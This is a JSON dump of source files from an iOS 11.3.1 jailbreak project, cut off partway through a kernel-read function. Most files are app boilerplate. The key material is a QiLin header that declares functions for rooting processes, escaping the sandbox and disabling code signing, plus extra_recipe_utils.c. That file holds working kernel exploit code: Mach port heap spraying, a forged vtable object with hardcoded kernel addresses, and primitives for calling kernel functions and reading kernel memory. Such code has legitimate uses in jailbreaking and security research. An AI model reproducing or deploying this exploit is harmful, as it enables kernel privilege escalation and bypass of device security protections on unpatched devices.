[
  {
    "path": "README.md",
    "content": "# multipath_kfree\n\n# DISABLE SIRI BEFORE RUNNING \nlow effort jb for iOS 11.3.1 by [@jaakerblom](https://twitter.com/jaakerblom)\n\nSets up kernel RWX with clear API\n\nTested on iPhone X only\n\nUses [QiLin](http://newosxbook.com/QiLin/) by Jonathan Levin\n\nThanks to:\n * Everyone including Stefan Esser\n\nSpecial thanks to:\n * [@i41nbeer](https://twitter.com/i41nbeer) \n * [@doadam](https://twitter.com/doadam)\n * Mr. 0xd503201f\n * [@Morpheus______](https://twitter.com/Morpheus______) \n\nNote about Siri: Siri has the multipath entitlement and seems to be using multipath sockets. The current code does not account for this, as it expects a new page for the multipath socket structs; therefore you either have to disable Siri or change the heap logic before running. \n"
  },
  {
    "path": "extra_recipe/AppDelegate.h",
    "content": "//\n//  AppDelegate.h\n//  multipath_kfree\n//\n//  Created by q on 6/1/18.\n//  Copyright © 2018 kjljkla. All rights reserved.\n//\n\n#import <UIKit/UIKit.h>\n\n@interface AppDelegate : UIResponder <UIApplicationDelegate>\n\n@property (strong, nonatomic) UIWindow *window;\n\n\n@end\n\n"
  },
  {
    "path": "extra_recipe/AppDelegate.m",
    "content": "//\n//  AppDelegate.m\n//  multipath_kfree\n//\n//  Created by q on 6/1/18.\n//  Copyright © 2018 kjljkla. All rights reserved.\n//\n\n#import \"AppDelegate.h\"\n\n@interface AppDelegate ()\n\n@end\n\n@implementation AppDelegate\n\n\n- (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {\n    // Override point for customization after application launch.\n    return YES;\n}\n\n\n- (void)applicationWillResignActive:(UIApplication *)application {\n    // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state.\n    // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game.\n}\n\n\n- (void)applicationDidEnterBackground:(UIApplication *)application {\n    // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later.\n    // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits.\n}\n\n\n- (void)applicationWillEnterForeground:(UIApplication *)application {\n    // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background.\n}\n\n\n- (void)applicationDidBecomeActive:(UIApplication *)application {\n    // Restart any tasks that were paused (or not yet started) while the application was inactive. 
If the application was previously in the background, optionally refresh the user interface.\n}\n\n\n- (void)applicationWillTerminate:(UIApplication *)application {\n    // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:.\n}\n\n\n@end\n"
  },
  {
    "path": "extra_recipe/AppDelegate.swift",
    "content": "//\n//  AppDelegate.swift\n//  extra_recipe\n//\n//  Created by Ian Beer on 1/23/17.\n//  Copyright © 2017 Ian Beer. All rights reserved.\n//\n\nimport UIKit\n\n@UIApplicationMain\nclass AppDelegate: UIResponder, UIApplicationDelegate {\n\n  var window: UIWindow?\n\n\n  func application(_ application: UIApplication, didFinishLaunchingWithOptions launchOptions: [UIApplicationLaunchOptionsKey: Any]?) -> Bool {\n    // Override point for customization after application launch.\n    return true\n  }\n\n  func applicationWillResignActive(_ application: UIApplication) {\n    // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state.\n    // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game.\n  }\n\n  func applicationDidEnterBackground(_ application: UIApplication) {\n    // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later.\n    // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits.\n  }\n\n  func applicationWillEnterForeground(_ application: UIApplication) {\n    // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background.\n  }\n\n  func applicationDidBecomeActive(_ application: UIApplication) {\n    // Restart any tasks that were paused (or not yet started) while the application was inactive. 
If the application was previously in the background, optionally refresh the user interface.\n  }\n\n  func applicationWillTerminate(_ application: UIApplication) {\n    // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:.\n  }\n\n\n}\n\n"
  },
  {
    "path": "extra_recipe/Assets.xcassets/AppIcon.appiconset/Contents.json",
    "content": "{\n  \"images\" : [\n    {\n      \"idiom\" : \"iphone\",\n      \"size\" : \"20x20\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"idiom\" : \"iphone\",\n      \"size\" : \"20x20\",\n      \"scale\" : \"3x\"\n    },\n    {\n      \"idiom\" : \"iphone\",\n      \"size\" : \"29x29\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"idiom\" : \"iphone\",\n      \"size\" : \"29x29\",\n      \"scale\" : \"3x\"\n    },\n    {\n      \"idiom\" : \"iphone\",\n      \"size\" : \"40x40\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"idiom\" : \"iphone\",\n      \"size\" : \"40x40\",\n      \"scale\" : \"3x\"\n    },\n    {\n      \"idiom\" : \"iphone\",\n      \"size\" : \"60x60\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"idiom\" : \"iphone\",\n      \"size\" : \"60x60\",\n      \"scale\" : \"3x\"\n    },\n    {\n      \"idiom\" : \"ipad\",\n      \"size\" : \"20x20\",\n      \"scale\" : \"1x\"\n    },\n    {\n      \"idiom\" : \"ipad\",\n      \"size\" : \"20x20\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"idiom\" : \"ipad\",\n      \"size\" : \"29x29\",\n      \"scale\" : \"1x\"\n    },\n    {\n      \"idiom\" : \"ipad\",\n      \"size\" : \"29x29\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"idiom\" : \"ipad\",\n      \"size\" : \"40x40\",\n      \"scale\" : \"1x\"\n    },\n    {\n      \"idiom\" : \"ipad\",\n      \"size\" : \"40x40\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"idiom\" : \"ipad\",\n      \"size\" : \"76x76\",\n      \"scale\" : \"1x\"\n    },\n    {\n      \"idiom\" : \"ipad\",\n      \"size\" : \"76x76\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"idiom\" : \"ipad\",\n      \"size\" : \"83.5x83.5\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"idiom\" : \"ios-marketing\",\n      \"size\" : \"1024x1024\",\n      \"scale\" : \"1x\"\n    }\n  ],\n  \"info\" : {\n    \"version\" : 1,\n    \"author\" : \"xcode\"\n  }\n}"
  },
  {
    "path": "extra_recipe/Assets.xcassets/Contents.json",
    "content": "{\n  \"info\" : {\n    \"version\" : 1,\n    \"author\" : \"xcode\"\n  }\n}"
  },
  {
    "path": "extra_recipe/Base.lproj/LaunchScreen.storyboard",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>\n<document type=\"com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB\" version=\"3.0\" toolsVersion=\"11134\" systemVersion=\"15F34\" targetRuntime=\"iOS.CocoaTouch\" propertyAccessControl=\"none\" useAutolayout=\"YES\" launchScreen=\"YES\" useTraitCollections=\"YES\" colorMatched=\"YES\" initialViewController=\"01J-lp-oVM\">\n    <dependencies>\n        <plugIn identifier=\"com.apple.InterfaceBuilder.IBCocoaTouchPlugin\" version=\"11106\"/>\n        <capability name=\"documents saved in the Xcode 8 format\" minToolsVersion=\"8.0\"/>\n    </dependencies>\n    <scenes>\n        <!--View Controller-->\n        <scene sceneID=\"EHf-IW-A2E\">\n            <objects>\n                <viewController id=\"01J-lp-oVM\" sceneMemberID=\"viewController\">\n                    <layoutGuides>\n                        <viewControllerLayoutGuide type=\"top\" id=\"Llm-lL-Icb\"/>\n                        <viewControllerLayoutGuide type=\"bottom\" id=\"xb3-aO-Qok\"/>\n                    </layoutGuides>\n                    <view key=\"view\" contentMode=\"scaleToFill\" id=\"Ze5-6b-2t3\">\n                        <rect key=\"frame\" x=\"0.0\" y=\"0.0\" width=\"375\" height=\"667\"/>\n                        <autoresizingMask key=\"autoresizingMask\" widthSizable=\"YES\" heightSizable=\"YES\"/>\n                        <color key=\"backgroundColor\" red=\"1\" green=\"1\" blue=\"1\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"sRGB\"/>\n                    </view>\n                </viewController>\n                <placeholder placeholderIdentifier=\"IBFirstResponder\" id=\"iYj-Kq-Ea1\" userLabel=\"First Responder\" sceneMemberID=\"firstResponder\"/>\n            </objects>\n            <point key=\"canvasLocation\" x=\"53\" y=\"375\"/>\n        </scene>\n    </scenes>\n</document>\n"
  },
  {
    "path": "extra_recipe/Base.lproj/Main.storyboard",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>\n<document type=\"com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB\" version=\"3.0\" toolsVersion=\"11134\" systemVersion=\"15F34\" targetRuntime=\"iOS.CocoaTouch\" propertyAccessControl=\"none\" useAutolayout=\"YES\" useTraitCollections=\"YES\" colorMatched=\"YES\" initialViewController=\"BYZ-38-t0r\">\n    <dependencies>\n        <plugIn identifier=\"com.apple.InterfaceBuilder.IBCocoaTouchPlugin\" version=\"11106\"/>\n        <capability name=\"documents saved in the Xcode 8 format\" minToolsVersion=\"8.0\"/>\n    </dependencies>\n    <scenes>\n        <!--View Controller-->\n        <scene sceneID=\"tne-QT-ifu\">\n            <objects>\n                <viewController id=\"BYZ-38-t0r\" customClass=\"ViewController\" customModuleProvider=\"target\" sceneMemberID=\"viewController\">\n                    <layoutGuides>\n                        <viewControllerLayoutGuide type=\"top\" id=\"y3c-jy-aDJ\"/>\n                        <viewControllerLayoutGuide type=\"bottom\" id=\"wfy-db-euE\"/>\n                    </layoutGuides>\n                    <view key=\"view\" contentMode=\"scaleToFill\" id=\"8bC-Xf-vdC\">\n                        <rect key=\"frame\" x=\"0.0\" y=\"0.0\" width=\"375\" height=\"667\"/>\n                        <autoresizingMask key=\"autoresizingMask\" widthSizable=\"YES\" heightSizable=\"YES\"/>\n                        <color key=\"backgroundColor\" red=\"1\" green=\"1\" blue=\"1\" alpha=\"1\" colorSpace=\"custom\" customColorSpace=\"sRGB\"/>\n                    </view>\n                </viewController>\n                <placeholder placeholderIdentifier=\"IBFirstResponder\" id=\"dkx-z0-nzr\" sceneMemberID=\"firstResponder\"/>\n            </objects>\n        </scene>\n    </scenes>\n</document>\n"
  },
  {
    "path": "extra_recipe/Info.plist",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n\t<key>CFBundleDevelopmentRegion</key>\n\t<string>$(DEVELOPMENT_LANGUAGE)</string>\n\t<key>CFBundleExecutable</key>\n\t<string>$(EXECUTABLE_NAME)</string>\n\t<key>CFBundleIdentifier</key>\n\t<string>$(PRODUCT_BUNDLE_IDENTIFIER)</string>\n\t<key>CFBundleInfoDictionaryVersion</key>\n\t<string>6.0</string>\n\t<key>CFBundleName</key>\n\t<string>$(PRODUCT_NAME)</string>\n\t<key>CFBundlePackageType</key>\n\t<string>APPL</string>\n\t<key>CFBundleShortVersionString</key>\n\t<string>1.0</string>\n\t<key>CFBundleVersion</key>\n\t<string>1</string>\n\t<key>LSRequiresIPhoneOS</key>\n\t<true/>\n\t<key>UILaunchStoryboardName</key>\n\t<string>LaunchScreen</string>\n\t<key>UIMainStoryboardFile</key>\n\t<string>Main</string>\n\t<key>UIRequiredDeviceCapabilities</key>\n\t<array>\n\t\t<string>armv7</string>\n\t</array>\n\t<key>UISupportedInterfaceOrientations</key>\n\t<array>\n\t\t<string>UIInterfaceOrientationPortrait</string>\n\t\t<string>UIInterfaceOrientationLandscapeLeft</string>\n\t\t<string>UIInterfaceOrientationLandscapeRight</string>\n\t</array>\n\t<key>UISupportedInterfaceOrientations~ipad</key>\n\t<array>\n\t\t<string>UIInterfaceOrientationPortrait</string>\n\t\t<string>UIInterfaceOrientationPortraitUpsideDown</string>\n\t\t<string>UIInterfaceOrientationLandscapeLeft</string>\n\t\t<string>UIInterfaceOrientationLandscapeRight</string>\n\t</array>\n</dict>\n</plist>\n"
  },
  {
    "path": "extra_recipe/QiLin.h",
    "content": "//\n//  jjt.h\n//  QiLin\n//\n//  Created by JL on 12/7/17.\n//  Copyright © 2017 NewOSXBook. All rights reserved.\n\n// Revision 3: Added spawnAndPlatformize(),\n//             moved to posix_spawn() implementation for exec() family\n//             actually exported the set*Reporter functions (formerly ErrorHandler.. etc -\n//             \"Reporter\" is more accurate, because they allow you to propagate messages to\n//             a GUI.\n//\n\n#ifndef qilin_h./Developer/Xcode/DerivedData/LiberiOS-eprgauhokruyejdrgttigzlnmnde/Build/Intermediates.noindex/LiberiOS.build\n#define qilin_h\n#include <mach/mach.h>\n#include <unistd.h>\n#include <stdlib.h>\n\n\nchar *getMachine (void);\nchar *getOSVer(void);\n\n\n// MUST call this first\n\nint initQiLin (mach_port_t TFP0, uint64_t KernelBase);\n\n// System wide effects\n//\nint remountRootFS (void);\npid_t execCommand(char *Cmd, char *Arg1, char *Arg2, char *Arg3, char *Arg4, char *Arg5 , int Flags);\nint execCommandAndWait(char *Cmd, char *Arg1, char *Arg2, char *Arg3, char *Arg4, char *Arg5);\n\nint setTFP0AsHostSpecialPort4 (void);\n\n// 1/17/18 - This is super useful\nint spawnAndPlatformize (char *AmfidebPath, char *Arg1, char *Arg2, char *Arg3 , char *Arg4, char *Arg5);\n\n\nint moveFileFromAppDir (char *File, char *Dest);\nint disableAutoUpdates(void);\n\n// Code signing\n\n// Will set AMFId's exception ports and thereby disable code signing\n//\nint castrateAmfid (void);\n\n// Utility function - you probably won't need this directly.\n#define ALGORITHM_SHA256    2\n#define ALGORITHM_SHA1      1\nchar *cdHashOfFile(char *fileName,int Algorithm); // Calculate CDHash of a given Mach-O (for messing with AMFI)\n\n\n\n// Kernel Memory access (wrappers over kernel_task send right)\nuint64_t findKernelSymbol (char *Symbol);\nvoid setKernelSymbol (char *Symbol, uint64_t Address);\n\nint readKernelMemory(uint64_t Address, uint64_t Len, void **To);\nint writeKernelMemory(uint64_t Address, uint64_t Len, void 
*From);\n\n// Not recommended, but doable: Bestow task port of Pid in TargetPid\nmach_port_t task_for_pid_in_kernel (pid_t Pid, pid_t TargetPid);\n\n// Process manipulation functions\n\n// Finds the address of struct proc for this pid_t in kernel memory.\nuint64_t getProcStructForPid(pid_t);\n\n\n// Finds the pid of a process given its (base) name. Note this will only\n// work on processes you are the owner of (or all, if root) - this is intentional\npid_t findPidOfProcess (char *ProcName) ;\n\nint setCSFlagsForProcAtAddr(uint64_t ProcStructAddr, int Flags, int Set);\nint setCSFlagsForPid (pid_t Whom);\nint platformizePid(pid_t Whom);\nint rootifyPid(pid_t Whom);\nint ShaiHuludPid (pid_t Whom);\nint unShaiHuludPid (pid_t Whom);\n\n\n\n\nuint64_t borrowEntitlementsFromDonor(char *UnwittingDonor, char *Arg);\n// By request :-)\nuint64_t borrowEntitlementsFromPid(pid_t    Pid);\n\n\n\n// Presently, limited to two entitlements, and assumed boolean (true)\nint entitlePidWithKernelEnts (pid_t Whom, char *Ent1, char *Ent2);\n\n// Convenience functions - do all the above , but on my process\n\nint platformizeMe (void);\nint rootifyMe(void);\n\n// Escape sandbox:\n// call with 0 to assume kernel cred, else specify value. Will return origCreds\nuint64_t ShaiHuludMe(uint64_t OtherCredsOr0ForKernelCreds);\nvoid unShaiHuludMe(uint64_t OrigCreds);\nint entitleMe(char *entitlementString);\n\nuint64_t getKernelCredAddr (void);\n\n\n/// Launchd handling utilities - just for you @launchderp :-)\nint makeLaunchdPlist (char *PlistName, char *Program, char *ProgramArguments, char *StandardOutputPath, char *StandardErrorPath, int RunAtLoad);\nint launjctlLaunchdPlist(char *Name);\n\n// I use these internally, not sure anyone else would need them\nint launjctlPrintSystem (void);\nint launjctlDumpState(void);\n\n\n// This one is still in progress. 
Don't use it please.\nint movePortToPid(mach_port_t PortMoved, pid_t Pid, mach_port_name_t Name);\nint spawnJailbreakServer (char *Name, mach_port_t TFP0, mach_port_name_t NameInTarget);\n\n// UI Support:\n// Provide status, error and debug print outs to user,\n// which may be redirected to GUI views, etc.\n// Default implmenentations are NSLog.\n\ntypedef void (status_func) (char *,...);\nvoid setStatusReporter (status_func *Func);\nvoid setErrorReporter (status_func *Func);\nvoid setDebugReporter (status_func *Func);\n\n\n// Utility functions you probably won't need unless you want to do your own debugging\nvoid hexDump(void *Mem, int Len, uint64_t Addr);\nvoid dumpARMThreadState64(_STRUCT_ARM_THREAD_STATE64 *old_state);\n\n// Even more Internal/advanced use:\nuint64_t findKernelTask (void);\nuint64_t findMyProcStructInKernelMemory(void);  // For other advanced uses I haven't provided already\n\n\n#endif /* qilin_h */\n"
  },
  {
    "path": "extra_recipe/README",
    "content": "\n"
  },
  {
    "path": "extra_recipe/ViewController.h",
    "content": "//\n//  ViewController.h\n//  multipath_kfree\n//\n//  Created by q on 6/1/18.\n//  Copyright © 2018 kjljkla. All rights reserved.\n//\n\n#import <UIKit/UIKit.h>\n\n@interface ViewController : UIViewController\n\n\n@end\n\n"
  },
  {
    "path": "extra_recipe/ViewController.m",
    "content": "//\n//  ViewController.m\n//  multipath_kfree\n//\n//  Created by q on 6/1/18.\n//  Copyright © 2018 kjljkla. All rights reserved.\n//\n\n#import \"ViewController.h\"\n\n#include \"jailbreak.h\"\n\n@interface ViewController ()\n\n@end\n\n@implementation ViewController\n\n- (void)viewDidLoad {\n    [super viewDidLoad];\n    // Do any additional setup after loading the view, typically from a nib.\n    jb_go();\n}\n\n\n- (void)didReceiveMemoryWarning {\n    [super didReceiveMemoryWarning];\n    // Dispose of any resources that can be recreated.\n}\n\n\n@end\n"
  },
  {
    "path": "extra_recipe/ViewController.swift",
    "content": "//\n//  ViewController.swift\n//  extra_recipe\n//\n//  Created by Ian Beer on 1/23/17.\n//  Copyright © 2017 Ian Beer. All rights reserved.\n//\n\nimport UIKit\n\nclass ViewController: UIViewController {\n\n  override func viewDidLoad() {\n    super.viewDidLoad()\n    DispatchQueue.main.async(execute: { () -> Void in\n      jb_go();\n    })\n  }\n\n\n  override func didReceiveMemoryWarning() {\n    super.didReceiveMemoryWarning()\n    // Dispose of any resources that can be recreated.\n  }\n\n\n}\n\n"
  },
  {
    "path": "extra_recipe/extra_recipe-Bridging-Header.h",
    "content": "//\n//  Use this file to import your target's public headers that you would like to expose to Swift.\n//\n\nint jb_go();\n"
  },
  {
    "path": "extra_recipe/extra_recipe.entitlements",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n\t<key>com.apple.developer.networking.multipath</key>\n\t<true/>\n</dict>\n</plist>\n"
  },
  {
    "path": "extra_recipe/extra_recipe_utils.c",
    "content": "// This code is lifted from extra_recipe by Ian Beer of Google Project Zero:\n// https://bugs.chromium.org/p/project-zero/issues/detail?id=1004\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <sys/time.h>\n#include <pthread.h>\n\n#include <mach/mach.h>\n#include <mach/mach_error.h>\n#include <mach/mach_port.h>\n#include <mach/mach_time.h>\n#include <mach/mach_traps.h>\n\n#include <mach/mach_voucher_types.h>\n#include <mach/port.h>\n\n#include <CoreFoundation/CoreFoundation.h>\n\n// IOKit stuff\n\n#define kIOMasterPortDefault MACH_PORT_NULL\n#define IO_OBJECT_NULL MACH_PORT_NULL\n\ntypedef mach_port_t io_iterator_t;\ntypedef mach_port_t io_service_t;\ntypedef mach_port_t io_connect_t;\ntypedef mach_port_t io_object_t;\ntypedef    char io_name_t[128];\n\n\nCFMutableDictionaryRef\nIOServiceMatching(const char* name );\n\nkern_return_t\nIOServiceGetMatchingServices(\n                             mach_port_t masterPort,\n                             CFDictionaryRef matching,\n                             io_iterator_t * existing );\n\nio_service_t\nIOServiceGetMatchingService(\n                            mach_port_t    masterPort,\n                            CFDictionaryRef    matching);\n\nio_object_t\nIOIteratorNext(\n               io_iterator_t    iterator );\n\nkern_return_t\nIOObjectGetClass(\n                 io_object_t    object,\n                 io_name_t    className );\n\nkern_return_t\nIOServiceOpen(\n              io_service_t    service,\n              task_port_t    owningTask,\n              uint32_t    type,\n              io_connect_t  *    connect );\n\nkern_return_t\nIOServiceClose(\n               io_connect_t    connect );\n\nkern_return_t\nIOObjectRelease(\n                io_object_t    object );\n\nkern_return_t\nIOConnectGetService(\n                    io_connect_t    connect,\n                    io_service_t  *    service );\n\n// mach_vm protos\n\nkern_return_t mach_vm_allocate\n(\n vm_map_t 
target,\n mach_vm_address_t *address,\n mach_vm_size_t size,\n int flags\n );\n\nkern_return_t mach_vm_deallocate\n(\n vm_map_t target,\n mach_vm_address_t address,\n mach_vm_size_t size\n );\n\nmach_port_t prealloc_port(int size) {\n    kern_return_t err;\n    mach_port_qos_t qos = {0};\n    qos.prealloc = 1;\n    qos.len = size;\n    \n    mach_port_name_t name = MACH_PORT_NULL;\n    \n    err = mach_port_allocate_full(mach_task_self(),\n                                  MACH_PORT_RIGHT_RECEIVE,\n                                  MACH_PORT_NULL,\n                                  &qos,\n                                  &name);\n    \n    if (err != KERN_SUCCESS) {\n        printf(\"pre-allocated port allocation failed: %s\\n\", mach_error_string(err));\n        return MACH_PORT_NULL;\n    }\n    \n    return (mach_port_t)name;\n}\n\n\nio_service_t service = MACH_PORT_NULL;\n\nio_connect_t alloc_userclient() {\n    kern_return_t err;\n    if (service == MACH_PORT_NULL) {\n        service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(\"AGXAccelerator\"));\n        \n        if (service == IO_OBJECT_NULL){\n            printf(\"unable to find service\\n\");\n            return 0;\n        }\n    }\n    \n    io_connect_t conn = MACH_PORT_NULL;\n    err = IOServiceOpen(service, mach_task_self(), 5, &conn); // AGXCommandQueue, 0xdb8\n    if (err != KERN_SUCCESS){\n        printf(\"unable to get user client connection\\n\");\n        return 0;\n    }\n    \n    return conn;\n}\n\n// each time we get an exception message copy the first 32 registers into this buffer\nuint64_t crash_buf[32] = {0}; // use the 32 general purpose ARM64 registers\n\n// implemented in load_regs_and_crash.s\nvoid load_regs_and_crash(uint64_t* buf);\n\n// (actually only 30 controlled qwords for the send)\nstruct thread_args {\n    uint64_t buf[32];\n    mach_port_t exception_port;\n};\n\nvoid* do_thread(void* arg) {\n    struct thread_args* args = (struct 
thread_args*)arg;\n    uint64_t buf[32];\n    memcpy(buf, args->buf, sizeof(buf));\n    \n    kern_return_t err;\n    err = thread_set_exception_ports(\n                                     mach_thread_self(),\n                                     EXC_MASK_ALL,\n                                     args->exception_port,\n                                     EXCEPTION_STATE, // we want to receive a catch_exception_raise_state message\n                                     ARM_THREAD_STATE64);\n    \n    free(args);\n    \n    load_regs_and_crash(buf);\n    printf(\"no crashy?\");\n    return NULL;\n}\n\nvoid prepare_prealloc_port(mach_port_t port) {\n    mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);\n}\n\nint port_has_message(mach_port_t port) {\n    kern_return_t err;\n    mach_port_seqno_t msg_seqno = 0;\n    mach_msg_size_t msg_size = 0;\n    mach_msg_id_t msg_id = 0;\n    mach_msg_trailer_t msg_trailer; // NULL trailer\n    mach_msg_type_number_t msg_trailer_size = sizeof(msg_trailer);\n    err = mach_port_peek(mach_task_self(),\n                         port,\n                         MACH_RCV_TRAILER_NULL,\n                         &msg_seqno,\n                         &msg_size,\n                         &msg_id,\n                         (mach_msg_trailer_info_t)&msg_trailer,\n                         &msg_trailer_size);\n    \n    return (err == KERN_SUCCESS);\n}\n\nuint8_t crash_stack[0x4000];\n\n// port needs to have a send right\nvoid send_prealloc_msg(mach_port_t port, uint64_t* buf, int n) {\n    struct thread_args* args = malloc(sizeof(struct thread_args));\n    memset(args, 0, sizeof(struct thread_args));\n    memcpy(args->buf, buf, n*8);\n\n    args->exception_port = port;\n    \n    // start a new thread passing it the buffer and the exception port\n    pthread_t t;\n    pthread_create(&t, NULL, do_thread, (void*)args);\n    \n    // associate the pthread_t with the port so that we can join the correct pthread\n    
// when we receive the exception message and it exits:\n    // kern_return_t err = mach_port_set_context(mach_task_self(), port, (mach_port_context_t)t);\n    //printf(\"set context\\n\");\n    // wait until the message has actually been sent:\n    while(!port_has_message(port)){;}\n    \n    thread_t thread = pthread_mach_thread_np(t);\n    thread_terminate(thread); // leaks pthread structs, will destroy you eventually\n}\n\n// the returned pointer is only valid until the next call to this function\n// ownership is retained by this function\nuint64_t* receive_prealloc_msg(mach_port_t port) {\n    uint8_t msg[1024];\n    memset(msg, 0x00, sizeof(msg));\n    mach_msg((mach_msg_header_t *)msg,\n                               MACH_RCV_MSG | MACH_MSG_TIMEOUT_NONE, // no timeout\n                               0,\n                               0x1000,\n                               port,\n                               0,\n                               0);\n    \n    memcpy(crash_buf, msg, sizeof(crash_buf));\n    \n    return &crash_buf[0];\n}\n\nint _kx_setup = 0;\nio_connect_t *_ucs = NULL;\nmach_port_t *_lazy_ports = NULL;\nuint64_t _kaslr_shift = 0;\nuint64_t _kernel_buffer_base = 0;\nio_connect_t *_uc = 0;\nmach_port_t _lazy_port = 0;\n\n\nstatic void _kx_find()\n{\n    uint64_t kernel_base = 0xfffffff007004000 + _kaslr_shift;\n    uint64_t osserializer_serialize = 0xfffffff0075468f8 + _kaslr_shift;\n    uint64_t get_metaclass = 0xfffffff007548a24 + _kaslr_shift;\n    uint64_t ret = get_metaclass + 8;\n    uint64_t copyout = 0xfffffff0071f5280 + _kaslr_shift;\n    volatile uint32_t feedfacf = 0;\n    \n    uint64_t r_obj[64];\n    memset(r_obj, 0, sizeof(r_obj));\n    r_obj[0] = _kernel_buffer_base+0x8;  // fake vtable points 8 bytes into this object\n    r_obj[1] = 0x20003;                 // refcount\n    r_obj[2] = _kernel_buffer_base+0x48 - 0x18 - 8 + 0x10;                       // obj + 0x10 -> rdi (memmove dst)\n    r_obj[3] = sizeof(uint32_t);            
        // obj + 0x18 -> rsi (memmove src)\n    r_obj[4] = osserializer_serialize;                    // obj + 0x20 -> fptr\n    r_obj[5] = ret;                     // vtable + 0x20 (::retain)\n    r_obj[6] = osserializer_serialize;  // vtable + 0x28 (::release)\n    r_obj[7] = 0x11;                     //\n    r_obj[8] = get_metaclass;           // vtable + 0x38 (::getMetaClass)\n    \n    r_obj[9] = kernel_base;\n    r_obj[10] = &feedfacf;\n    r_obj[11] = copyout;\n    \n    memmove((uint8_t *)r_obj + 0x10, r_obj, sizeof(r_obj) - 0x10);\n    \n    for (int i = 0; i < 1000; ++i) {\n        send_prealloc_msg(_lazy_ports[i], (uint64_t *)r_obj, 30);\n    }\n\n    \n    for (int i = 0; i < 1000; ++i) {\n        io_service_t service;\n        IOConnectGetService(_ucs[i], &service);\n        if (feedfacf != 0) {\n            _uc = _ucs[i];\n            break;\n        }\n    }\n    \n    for (int i = 0; i < 1000; ++i) {\n        receive_prealloc_msg(_lazy_ports[i]);\n    }\n    \n    r_obj[9+2] = kernel_base + 1;\n    \n    int sent_count = 0;\n    for (int i = 0; i < 1000; ++i) {\n        send_prealloc_msg(_lazy_ports[i], (uint64_t *)r_obj, 30);\n    \n        io_service_t service;\n        IOConnectGetService(_uc, &service);\n        \n        if (feedfacf != 0xfeedfacf) {\n            _lazy_port = _lazy_ports[i];\n            sent_count = i+1;\n            break;\n        }\n    }\n    \n    for (int i = 0; i < sent_count; ++i) {\n        receive_prealloc_msg(_lazy_ports[i]);\n    }\n}\n\nvoid kx_setup(io_connect_t *ucs, mach_port_t *lazy_ports, uint64_t kaslr_shift, uint64_t kernel_buffer_base)\n{\n    _ucs = ucs;\n    _lazy_ports = lazy_ports;\n    _kaslr_shift = kaslr_shift;\n    _kernel_buffer_base = kernel_buffer_base;\n    \n    for (int i = 0; i < 1000; ++i) {\n         prepare_prealloc_port(lazy_ports[i]);\n    }\n    \n    _kx_find();\n}\n\nvoid kx3(uint64_t fptr, uint64_t arg0, uint64_t arg1, uint64_t arg2) {\n    uint64_t osserializer_serialize = 
0xfffffff0075468f8 + _kaslr_shift;\n    uint64_t get_metaclass = 0xfffffff007548a24 + _kaslr_shift;\n    uint64_t ret = get_metaclass + 8;\n    uint64_t copyout = 0xfffffff0071f5280 + _kaslr_shift;\n    \n    uint64_t r_obj[64];\n    memset(r_obj, 0, sizeof(r_obj));\n    r_obj[0] = _kernel_buffer_base+0x8;  // fake vtable points 8 bytes into this object\n    r_obj[1] = 0x20003;                 // refcount\n    r_obj[2] = _kernel_buffer_base+0x48 - 0x18 - 8 + 0x10;                       // obj + 0x10 -> rdi (memmove dst)\n    r_obj[3] = arg2;                    // obj + 0x18 -> rsi (memmove src)\n    r_obj[4] = osserializer_serialize;                    // obj + 0x20 -> fptr\n    r_obj[5] = ret;                     // vtable + 0x20 (::retain)\n    r_obj[6] = osserializer_serialize;  // vtable + 0x28 (::release)\n    r_obj[7] = 0x11;                     //\n    r_obj[8] = get_metaclass;           // vtable + 0x38 (::getMetaClass)\n    \n    r_obj[9] = arg0;\n    r_obj[10] = arg1;\n    r_obj[11] = fptr;\n    \n    memmove((uint8_t *)r_obj + 0x10, r_obj, sizeof(r_obj) - 0x10);\n    \n    send_prealloc_msg(_lazy_port, (uint64_t *)r_obj, 30);\n\n    io_service_t service;\n    IOConnectGetService(_uc, &service);\n    \n    receive_prealloc_msg(_lazy_port);\n}\n\nvoid kread(uint64_t addr, uint8_t *userspace, int n)\n{\n    uint64_t copyout = 0xfffffff0071f5280 + 